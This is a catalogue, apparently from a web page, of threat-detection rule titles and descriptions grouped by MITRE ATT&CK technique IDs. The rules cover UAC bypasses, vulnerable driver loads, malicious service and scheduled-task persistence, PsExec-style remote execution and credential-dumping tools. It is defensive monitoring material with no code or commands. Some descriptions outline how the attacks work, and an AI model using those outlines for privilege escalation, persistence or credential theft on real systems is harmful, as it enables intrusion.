    Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
  • UAC Bypass Using IDiagnostic Profile - File - Level: high
    Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
  • UAC Bypass Using IEInstal - File - Level: high
    Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
  • UAC Bypass Using MSConfig Token Modification - File - Level: high
    Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
  • UAC Bypass Using NTFS Reparse Point - File - Level: high
    Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
  • UAC Bypass Abusing Winsat Path Parsing - File - Level: high
    Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
  • UAC Bypass Using Windows Media Player - File - Level: high
    Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
  • UAC Bypass Using Iscsicpl - ImageLoad - Level: high
    Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
  • UAC Bypass With Fake DLL - Level: high
    Description: Attempts to load dismcore.dll after dropping it
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Function Call From Undocumented COM Interface EditionUpgradeManager - Level: medium
    Description: Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.
  • UAC Bypass Using WOW64 Logger DLL Hijack - Level: high
    Description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
  • PowerShell Web Access Feature Enabled Via DISM - Level: high
    Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
  • Potentially Suspicious Event Viewer Child Process - Level: high
    Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
  • Explorer NOUACCHECK Flag - Level: high
    Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
  • HackTool - Empire PowerShell UAC Bypass - Level: critical
    Description: Detects some Empire PowerShell UAC bypass methods
  • HackTool - UACMe Akagi Execution - Level: high
    Description: Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Sdclt Child Processes - Level: medium
    Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
  • Always Install Elevated Windows Installer - Level: medium
    Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
  • Always Install Elevated MSI Spawned Cmd And Powershell - Level: medium
    Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
  • Bypass UAC via CMSTP - Level: high
    Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
  • UAC Bypass Using Disk Cleanup - Level: high
    Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
  • UAC Bypass Using ChangePK and SLUI - Level: high
    Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
  • CMSTP UAC Bypass via COM Object Access - Level: high
    Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
  • UAC Bypass Tools Using ComputerDefaults - Level: high
    Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
  • UAC Bypass Using Consent and Comctl32 - Process - Level: high
    Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
  • UAC Bypass Using DismHost - Level: high
    Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
  • Bypass UAC via Fodhelper.exe - Level: high
    Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
  • UAC Bypass Using NTFS Reparse Point - Process - Level: high
    Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
  • UAC Bypass via ICMLuaUtil - Level: high
    Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
  • UAC Bypass Using IDiagnostic Profile - Level: high
    Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
  • UAC Bypass Using IEInstal - Process - Level: high
    Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
  • UAC Bypass Using MSConfig Token Modification - Process - Level: high
    Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
  • UAC Bypass Using PkgMgr and DISM - Level: high
    Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
  • Potential UAC Bypass Via Sdclt.EXE - Level: medium
    Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
  • TrustedPath UAC Bypass Pattern - Level: critical
    Description: Detects indicators of a UAC bypass method by mocking directories
  • UAC Bypass Abusing Winsat Path Parsing - Process - Level: high
    Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
  • UAC Bypass Using Windows Media Player - Process - Level: high
    Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
  • Bypass UAC via WSReset.exe - Level: high
    Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
  • UAC Bypass WSReset - Level: high
    Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
  • UAC Bypass Via Wsreset - Level: high
    Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
  • Shell Open Registry Keys Manipulation - Level: high
    Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
  • Bypass UAC Using DelegateExecute - Level: high
    Description: Bypasses User Account Control using a fileless method
  • Bypass UAC Using SilentCleanup Task - Level: high
    Description: Detects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
  • UAC Bypass via Event Viewer - Level: high
    Description: Detects UAC bypass method using Windows event viewer
  • UAC Bypass via Sdclt - Level: high
    Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
  • UAC Bypass Abusing Winsat Path Parsing - Registry - Level: high
    Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
  • UAC Bypass Using Windows Media Player - Registry - Level: high
    Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
  • UAC Disabled - Level: medium
    Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
  • UAC Notification Disabled - Level: medium
    Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
  • UAC Secure Desktop Prompt Disabled - Level: medium
    Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
  • MSI Spawned Cmd and Powershell Spawned Processes - Level: high
    Description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes
  • Always Install Elevated Parent Child Correlated - Level: high
    Description: This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege
attack.t1543.003 52
Show Rules (52)
  • Vulnerable AVAST Anti Rootkit Driver Load - Level: high
    Description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products
  • Vulnerable Driver Load By Name - Level: low
    Description: Detects the load of known vulnerable drivers via their names only.
  • Vulnerable GIGABYTE Driver Load - Level: high
    Description: Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation
  • Vulnerable HW Driver Load - Level: high
    Description: Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation
  • New Service Creation - Level: low
    Description: Detects creation of a new service.
  • CobaltStrike Service Installations - Security - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
  • Remote Access Tool Services Have Been Installed - Security - Level: medium
    Description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
  • CobaltStrike Service Installations - System - Level: critical
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
  • Moriya Rootkit - System - Level: critical
    Description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
  • New PDQDeploy Service - Server Side - Level: medium
    Description: Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines
  • New PDQDeploy Service - Client Side - Level: medium
    Description: Detects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1
  • ProcessHacker Privilege Elevation - Level: high
    Description: Detects a ProcessHacker tool that elevated privileges to a very high level
  • Remote Access Tool Services Have Been Installed - System - Level: medium
    Description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
  • Sliver C2 Default Service Installation - Level: high
    Description: Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands
  • Suspicious Service Installation - Level: high
    Description: Detects suspicious service installation commands
  • Uncommon Service Installation Image Path - Level: medium
    Description: Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
  • Service Installation in Suspicious Folder - Level: medium
    Description: Detects service installation in suspicious folder appdata
  • Service Installation with Suspicious Folder Pattern - Level: high
    Description: Detects service installation with suspicious folder patterns
  • Suspicious Service Installation Script - Level: high
    Description: Detects suspicious service installation scripts
  • Malicious Driver Load - Level: high
    Description: Detects loading of known malicious drivers via their hash.
  • Malicious Driver Load By Name - Level: medium
    Description: Detects loading of known malicious drivers via the file name of the drivers.
  • Driver Load From A Temporary Directory - Level: high
    Description: Detects a driver load from a temporary directory
  • Vulnerable Driver Load By Name - Level: low
    Description: Detects the load of known vulnerable drivers via the file name of the drivers.
  • Vulnerable HackSys Extreme Vulnerable Driver Load - Level: high
    Description: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors
  • Vulnerable WinRing0 Driver Load - Level: high
    Description: Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation
  • Vulnerable Driver Load - Level: high
    Description: Detects loading of known vulnerable drivers via their hash.
  • PSEXEC Remote Execution File Artefact - Level: high
    Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
  • Potential Discovery Activity Via Dnscmd.EXE - Level: medium
    Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
  • New Service Creation Using PowerShell - Level: low
    Description: Detects the creation of a new service using powershell.
  • Suspicious Service DACL Modification Via Set-Service Cmdlet - Level: high
    Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
  • New Service Creation Using Sc.EXE - Level: low
    Description: Detects the creation of a new service using the "sc.exe" utility.
  • New Kernel Driver Via SC.EXE - Level: medium
    Description: Detects creation of a new service (kernel driver) with the type "kernel"
  • Allow Service Access Using Security Descriptor Tampering Via Sc.EXE - Level: high
    Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
  • Deny Service Access Using Security Descriptor Tampering Via Sc.EXE - Level: high
    Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
  • Suspicious Service Path Modification - Level: high
    Description: Detects service path modification via the "sc" binary to a suspicious command or path
  • Potential Persistence Attempt Via Existing Service Tampering - Level: medium
    Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
  • Suspicious New Service Creation - Level: high
    Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
  • Sysinternals PsService Execution - Level: medium
    Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
  • Sysinternals PsSuspend Execution - Level: medium
    Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
  • Potential CobaltStrike Service Installations - Registry - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
  • ServiceDll Hijack - Level: medium
    Description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
  • CosmicDuke Service Installation - Level: critical
    Description: Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
  • StoneDrill Service Install - Level: high
    Description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
  • Turla Service Install - Level: high
    Description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
  • Turla PNG Dropper Service - Level: critical
    Description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Moriya Rootkit File Created - Level: critical
    Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
  • Rare Service Installations - Level: low
    Description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
attack.t1053.005 51
Show Rules (51)
  • Suspicious Add Scheduled Task From User AppData Temp - Level: high
    Description: schtasks.exe create task from user AppData\Local\Temp
  • Persistence and Execution at Scale via GPO Scheduled Task - Level: high
    Description: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
  • Suspicious Scheduled Task Creation - Level: high
    Description: Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
  • Important Scheduled Task Deleted/Disabled - Level: high
    Description: Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
  • Suspicious Scheduled Task Update - Level: high
    Description: Detects update to a scheduled task event that contain suspicious keywords.
  • Scheduled Task Executed From A Suspicious Location - Level: medium
    Description: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
  • Scheduled Task Executed Uncommon LOLBIN - Level: medium
    Description: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
  • Powershell Create Scheduled Task - Level: medium
    Description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
  • Suspicious Modification Of Scheduled Tasks - Level: high
    Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload
  • Suspicious Schtasks Execution AppData Folder - Level: high
    Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
  • Scheduled Task Creation Via Schtasks.EXE - Level: low
    Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
  • Suspicious Scheduled Task Creation Involving Temp Folder - Level: high
    Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
  • Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE - Level: medium
    Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
  • Schtasks From Suspicious Folders - Level: high
    Description: Detects scheduled task creations that have suspicious action command and folder combinations
  • Suspicious Scheduled Task Name As GUID - Level: medium
    Description: Detects creation of a scheduled task with a GUID like name
  • Uncommon One Time Only Scheduled Task At 00:00 - Level: high
    Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
  • Potential Persistence Via Microsoft Compatibility Appraiser - Level: medium
    Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
  • Potential Persistence Via Powershell Search Order Hijacking - Task - Level: high
    Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
  • Scheduled Task Executing Payload from Registry - Level: medium
    Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
  • Scheduled Task Executing Encoded Payload from Registry - Level: high
    Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
  • Suspicious Schtasks Schedule Types - Level: high
    Description: Detects scheduled task creations or modification on a suspicious schedule type
  • Suspicious Schtasks Schedule Type With High Privileges - Level: medium
    Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
  • Suspicious Scheduled Task Creation via Masqueraded XML File - Level: medium
    Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
  • Suspicious Command Patterns In Scheduled Task Creation - Level: high
    Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
  • Schtasks Creation Or Modification With SYSTEM Privileges - Level: high
    Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
  • Scheduled TaskCache Change by Uncommon Program - Level: high
    Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
  • Potential Registry Persistence Attempt Via Windows Telemetry - Level: high
    Description: Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Defrag Deactivation - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • Potential BearLPE Exploitation - Level: high
    Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • ChromeLoader Malware Execution - Level: high
    Description: Detects execution of ChromeLoader malware via a registered scheduled task
  • Serpent Backdoor Payload Execution Via Scheduled Task - Level: high
    Description: Detects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
  • Potential ACTINIUM Persistence Activity - Level: high
    Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
  • Diamond Sleet APT Scheduled Task Creation - Level: critical
    Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
  • Kapeka Backdoor Persistence Activity - Level: high
    Description: Detects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
  • Kapeka Backdoor Scheduled Task Creation - Level: high
    Description: Detects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.
  • Scheduled Task Deletion - Level: low
    Description: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
  • Scheduled Task Created - FileCreation - Level: low
    Description: Detects the creation of a scheduled task via file creation.
  • Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location - Level: low
    Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. Investigation of the loading application and its behavior is required to determining if its malicious.
  • Scheduled Task Creation From Potential Suspicious Parent Location - Level: medium
    Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
  • Scheduled Task Created - Registry - Level: low
    Description: Detects the creation of a scheduled task via Registry keys.
  • Remote Schtasks Creation - Level: medium
    Description: Detects remote execution via scheduled task creation or update on the destination host
  • Rare Schtasks Creations - Level: low
    Description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
  • Rare Scheduled Task Creations - Level: low
    Description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
attack.t1569.002 50
Show Rules (50)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • PowerShell Scripts Run by a Services - Level: high
    Description: Detects powershell script installed as a Service
  • PsExec Pipes Artifacts - Level: medium
    Description: Detecting use PsExec via Pipe Creation/Access to pipes
  • Renamed PaExec Execution - Level: medium
    Description: Detects execution of renamed paexec via imphash and executable product string
  • PsExec Tool Execution - Level: low
    Description: Detects PsExec service execution via default service image name
  • PsExec Service Start - Level: low
    Description: Detects a PsExec service start
  • Remote Server Service Abuse for Lateral Movement - Level: high
    Description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
  • MITRE BZAR Indicators for Execution - Level: medium
    Description: Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
  • DNS Events Related To Mining Pools - Level: low
    Description: Identifies clients that may be performing DNS lookups associated with common currency mining pools.
  • CobaltStrike Service Installations - Security - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
  • PowerShell Scripts Installed as Services - Security - Level: high
    Description: Detects powershell script installed as a Service
  • Remote Access Tool Services Have Been Installed - Security - Level: medium
    Description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
  • CobaltStrike Service Installations - System - Level: critical
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
  • smbexec.py Service Installation - Level: high
    Description: Detects the use of smbexec.py tool by detecting a specific service installation
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • PowerShell Scripts Installed as Services - Level: high
    Description: Detects powershell script installed as a Service
  • CSExec Service Installation - Level: medium
    Description: Detects CSExec service installation and execution events
  • HackTool Service Registration or Execution - Level: high
    Description: Detects installation or execution of services
  • PAExec Service Installation - Level: medium
    Description: Detects PAExec service installation
  • ProcessHacker Privilege Elevation - Level: high
    Description: Detects a ProcessHacker tool that elevated privileges to a very high level
  • RemCom Service Installation - Level: medium
    Description: Detects RemCom service installation and execution events
  • Remote Access Tool Services Have Been Installed - System - Level: medium
    Description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
  • Sliver C2 Default Service Installation - Level: high
    Description: Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands
  • PsExec Service Installation - Level: medium
    Description: Detects PsExec service installation and execution events
  • PSExec and WMI Process Creations Block - Level: high
    Description: Detects blocking of process creations originating from PSExec and WMI commands
  • CSExec Service File Creation - Level: medium
    Description: Detects default CSExec service filename which indicates CSExec service installation and execution
  • RemCom Service File Creation - Level: medium
    Description: Detects default RemCom service filename which indicates RemCom service installation and execution
  • PsExec Service File Creation - Level: low
    Description: Detects default PsExec service filename which indicates PsExec service installation and execution
  • PUA - CSExec Default Named Pipe - Level: medium
    Description: Detects default CSExec pipe creation
  • PUA - PAExec Default Named Pipe - Level: medium
    Description: Detects PAExec default named pipe
  • PUA - RemCom Default Named Pipe - Level: medium
    Description: Detects default RemCom pipe creation
  • PsExec Tool Execution From Suspicious Locations - PipeName - Level: medium
    Description: Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack
  • HackTool - SharpUp PrivEsc Tool Execution - Level: critical
    Description: Detects the use of SharpUp, a tool for local privilege escalation
  • Start Windows Service Via Net.EXE - Level: low
    Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
  • PUA - CsExec Execution - Level: high
    Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
  • PUA - NirCmd Execution - Level: medium
    Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
  • PUA - NirCmd Execution As LOCAL SYSTEM - Level: high
    Description: Detects the use of NirCmd tool for command execution as SYSTEM user
  • PUA - NSudo Execution - Level: high
    Description: Detects the use of NSudo tool for command execution
  • PUA - RunXCmd Execution - Level: high
    Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
  • Rundll32 Execution Without Parameters - Level: high
    Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
  • Potential CobaltStrike Service Installations - Registry - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
  • PowerShell as a Service in Registry - Level: high
    Description: Detects that a powershell code is written to the registry as a service.
  • CosmicDuke Service Installation - Level: critical
    Description: Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
  • DNS RCE CVE-2020-1350 - Level: critical
    Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
  • Potential CVE-2022-26809 Exploitation Attempt - Level: high
    Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
  • PsExec Default Named Pipe - Level: low
    Description: Detects PsExec service default pipe creation
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
attack.t1218.011 44
Show Rules (44)
  • Suspicious Rundll32 Script in CommandLine - Level: medium
    Description: Detects suspicious process related to rundll32 based on arguments
  • Remote Thread Creation Via PowerShell In Uncommon Target - Level: medium
    Description: Detects the creation of a remote thread from a Powershell process in an uncommon target process
  • SCR File Write Event - Level: medium
    Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
  • Unsigned DLL Loaded by Windows Utility - Level: medium
    Description: Detects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.
  • Rundll32 Internet Connection - Level: medium
    Description: Detects a rundll32 that communicates with public IP addresses
  • Outbound Network Connection To Public IP Via Winlogon - Level: medium
    Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
  • Process Access via TrolleyExpress Exclusion - Level: high
    Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
